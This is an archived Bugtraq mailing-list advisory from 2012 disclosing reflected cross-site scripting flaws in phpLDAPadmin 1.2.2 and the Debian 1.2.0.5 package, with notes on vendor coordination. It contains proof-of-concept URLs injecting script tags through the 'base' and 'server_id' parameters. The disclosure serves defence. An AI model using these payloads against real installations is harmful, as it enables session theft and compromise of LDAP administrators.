'XSS phpLDAPadmin: 1.2.0.5 (Debian package) and 1.2.2 (sourceforge)'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    XSS phpLDAPadmin: 1.2.0.5 (Debian package) and 1.2.2 (sourceforge)
From:       andsarmiento () gmail ! com
Date:       2012-01-31 18:54:35
Message-ID: 201201311854.q0VIsZ3B009020 () sf01web2 ! securityfocus ! com
[Download RAW message or body]

Attach some PoC analysis related to a XSS vulnerability to phpldapadmin. I previously \
coordinate with the Cert-US in order they contact with Sourceforge and Debian, but \
receive they was unable to put in contact with them.

The first discover was on January 10 for 1.1.6 version, where after noticed that the \
same vulnerability was discover previously. For that reason I tested later for \
version 1.2.2 (sourceforge) and 1.2.0.5 (Debian package). More reference: see the \
files attached

On January 24 I contacted to sourceforge and appear they fix the package but still \
persistence on debian packages.

Fix from sourceforge:
https://sourceforge.net/tracker/index.php?func=detail&aid=3477910&group_id=61828&atid=498546





Background:
===========
phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, \
multilanguage administration for your LDAP server. Its hierarchical tree-viewer and \
advanced search functionality make it intuitive to browse and administer your LDAP \
directory. Since it is a web application, this LDAP browser works on many platforms, \
making your LDAP server easily manageable from any location.


Details:
========

1.- Version 1.2.2 from Sourceforge \
package:http://sourceforge.net/projects/phpldapadmin/files/phpldapadmin-php5/1.2.2/phpldapadmin-1.2.2.tgz/download


Exploitables URI's: http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server \
_id=1&query=none&format=list&showresults=na&base=?&scope=sub&filter=objectClass%3D*&di \
splay_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search


PoC:
http://x.x.x.x/phpldapadmin/htdocs/cmd.php?cmd=query_engine&server_id=1&query=none&for \
mat=list&showresults=na&base=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&scope=sub \
&filter=objectClass%3D*&display_attrs=cn%2C+sn%2C+uid%2C+postalAddress%2C+telephoneNumber&orderby=&size_limit=50&search=Search


Exploitable variable: base

Results: XSS passing through "base" variable.

2.- Version 1.2.0.5 from debian (testing and unstable repositories)
Package:
Version: 1.2.0.5-2
Depends: apache2 | httpd, php5-ldap, libapache2-mod-php5 | libapache-mod-php5 | \
                php5-cgi | php5, ucf (>= 0.28), debconf (>= 0.5) | debconf-2.0
Filename: pool/main/p/phpldapadmin/phpldapadmin_1.2.0.5-2_all.deb
Size: 1276080
MD5sum: 3b4058f7fc74ff95f8223bf92bb99ec7
SHA1: 2594603f2346de814195bc6aba5e97a4febb17fb
SHA256: 4e1be7218c8030f1f17c5cd4c4f4fdb69cf5315d3e4b22bb2b4cabd7cfb93d57

PoC:

https://x.x.x.x/phpldapadmin/cmd.php?server_id=<script>alert('XSS')</script>
https://x.x.x.x/phpldapadmin/index.php?server_id=<script>alert('XSS')</script>&redirect=false


Exploitable Variable: server_id

Results: XSS passing through "server_id" variable.

Impact: Remote attackers might be able to perform Cross-Site Scripting (XSS) attacks \
by various vectors.

Thanks in advance for your comments
Kind Regards


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic